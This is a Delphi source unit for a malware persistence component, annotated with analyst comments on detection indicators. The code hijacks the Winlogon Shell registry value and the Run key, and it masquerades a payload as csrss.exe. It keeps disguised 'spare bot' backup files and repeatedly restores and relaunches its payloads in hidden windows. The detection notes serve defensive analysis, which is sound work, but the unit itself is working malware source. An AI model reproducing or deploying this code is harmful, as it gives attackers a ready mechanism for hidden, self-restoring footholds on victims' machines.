unit persistence;
interface
uses
Windows,SysUtils, registry, Variants, Classes,
Forms, ExtCtrls, shellapi;
type
// Analyst note: this TForm subclass exists only to host Timer1; the timer
// callback (Timer1Timer, implementation section) performs all registry and
// file-system activity in this unit.
TForm3 = class(TForm)
// Drives the periodic persistence routine; its interval comes from the .dfm
// resource and is not visible in this unit.
Timer1: TTimer;
// Enables Timer1 as soon as the form is created.
procedure FormCreate(Sender: TObject);
// Timer callback: registry writes, file copies and process launches.
procedure Timer1Timer(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form3: TForm3;
implementation
{$R *.dfm}
// Copies the entire contents of FSrc to FDst in a single CopyFrom call.
// FSrc is opened read-only; FDst is created with fmCreate, so an existing
// destination file is truncated and overwritten.
// Raises an exception if FSrc cannot be opened or FDst cannot be created;
// both streams are released by the nested try/finally blocks in either case.
procedure FileCopy(const FSrc, FDst: string);
var
sStream,
dStream: TFileStream;
begin
sStream := TFileStream.Create(FSrc, fmOpenRead);
try
dStream := TFileStream.Create(FDst, fmCreate);
try
{Forget about block reads and writes, just copy
the whole darn thing.}
// Count = 0 means "copy everything from the current position to the end".
dStream.CopyFrom(sStream, 0);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
end;
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
// "Shell" = "explorer.exe, scvhost.exe"
// Writes two autostart values under HKEY_LOCAL_MACHINE (writing to HKLM
// normally requires an administrative context):
//   SOFTWARE\Microsoft\Windows\CurrentVersion\Run          : regstr  = exepath
//   SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon  : regstr1 = exepath1
// Both keys are opened with CanCreate = TRUE, so a missing key is created.
// Detection note: the Winlogon "Shell" value is "explorer.exe" on a default
// system; any additional entries in it, or a Run value written by a process
// like this one, are high-fidelity indicators. Registry set-value telemetry on
// both paths is the recommended monitoring point.
procedure doreg(regstr, regstr1, exepath, exepath1: string);
var
EdReg: TRegistry;
opnkey: string;
begin
try
opnkey := 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run';
// start creating the key in the registry
EdReg := TRegistry.Create;
EdReg.rootkey := HKEY_LOCAL_MACHINE;
// TRUE = create the key if it does not already exist
if EdReg.OpenKey(opnkey, TRUE) then
begin
EdReg.WriteString(regstr, exepath);
end;
opnkey := 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon';
// a second TRegistry instance is created for the Winlogon key
EdReg := TRegistry.Create;
EdReg.rootkey := HKEY_LOCAL_MACHINE;
if EdReg.OpenKey(opnkey, TRUE) then
begin
EdReg.WriteString(regstr1, exepath1);
end;
finally
EdReg.Free;
end;
end;
// this file should be called SYSCHK.EXE and placed in C:\WINDOWS
// payload should be called MSAudioSv.EXE and placed in C:\WINDOWS
// Starts Timer1 as soon as the form is created; every tick re-runs
// Timer1Timer, so the persistence routine below repeats for the lifetime of
// the process.
procedure TForm3.FormCreate(Sender: TObject);
begin
Timer1.Enabled := TRUE;
end;
// Periodic persistence routine. On every timer tick it:
//   1. rewrites HKLM\...\Winlogon\Shell (value name 'shell') to a list that
//      places Explorer.exe ahead of Syschk.exe, MSAudioSv.exe and c:\csrss.exe;
//      the Run-key write inside doreg receives an empty value name and path;
//   2. copies c:\windows\MSAudioSv.exe to c:\windows\SysAudioSv.Manifest as a
//      backup copy;
//   3. if MSAudioSv.exe or c:\csrss.exe is missing, restores it from its
//      backup (.Manifest) file and launches it with a hidden window;
//   4. rewrites the Shell value a second time.
// Detection/IR notes: the expected Winlogon Shell value is "explorer.exe"
// alone; an executable named csrss.exe outside %SystemRoot%\System32, and
// ".Manifest" files in C:\Windows that contain executable content, are the
// file-system indicators produced by this routine. The copy in step 2 is
// outside any exception handler, so when MSAudioSv.exe is absent the tick
// raises before the restore branches run; the restore branches themselves
// swallow all exceptions (empty 'on E: Exception do' handlers).
procedure TForm3.Timer1Timer(Sender: TObject);
begin
// regstr = '' and exepath = '' are passed for the Run key; the Winlogon
// 'shell' value receives the full list.
doreg('', 'shell', '',
'Explorer.exe, Syschk.exe, MSAudioSv.exe, c:\csrss.exe,');
// backup copy of the payload; raises if the source file does not exist
FileCopy('c:\windows\MSAudioSv.exe','c:\windows\SysAudioSv.Manifest');
if not fileexists('c:\windows\MSAudioSv.exe') then
begin
try
// copy spare bot to c:\windows\MSAudioSv.exe
// spare = C:\WINDOWS\SysAudioSv.Manifest
FileCopy('c:\windows\SysAudioSv.Manifest','c:\windows\MSAudioSv.exe');
// launch with a hidden window (sw_HIDE)
ShellExecute(form3.Handle, nil, 'c:\windows\MSAudioSv.exe','', nil, sw_HIDE);
except
// empty handler: any failure in the copy or launch is silently ignored
on E: Exception do
end;
end;
if not fileexists('c:\csrss.exe') then
begin
try
// copy spare to c:\csrss.exe
// spare = C:\WINDOWS\csr.Manifest
FileCopy('c:\windows\csr.Manifest','c:\csrss.exe');
// launch with a hidden window (sw_HIDE)
ShellExecute(form3.Handle, nil, 'c:\csrss.exe','', nil, sw_HIDE);
except
// empty handler: any failure in the copy or launch is silently ignored
on E: Exception do
end;
end;
// second write of the same Shell value (differs from the first only in
// whitespace before c:\csrss.exe)
doreg('', 'shell', '',
'Explorer.exe, Syschk.exe, MSAudioSv.exe,c:\csrss.exe,');
end;
end.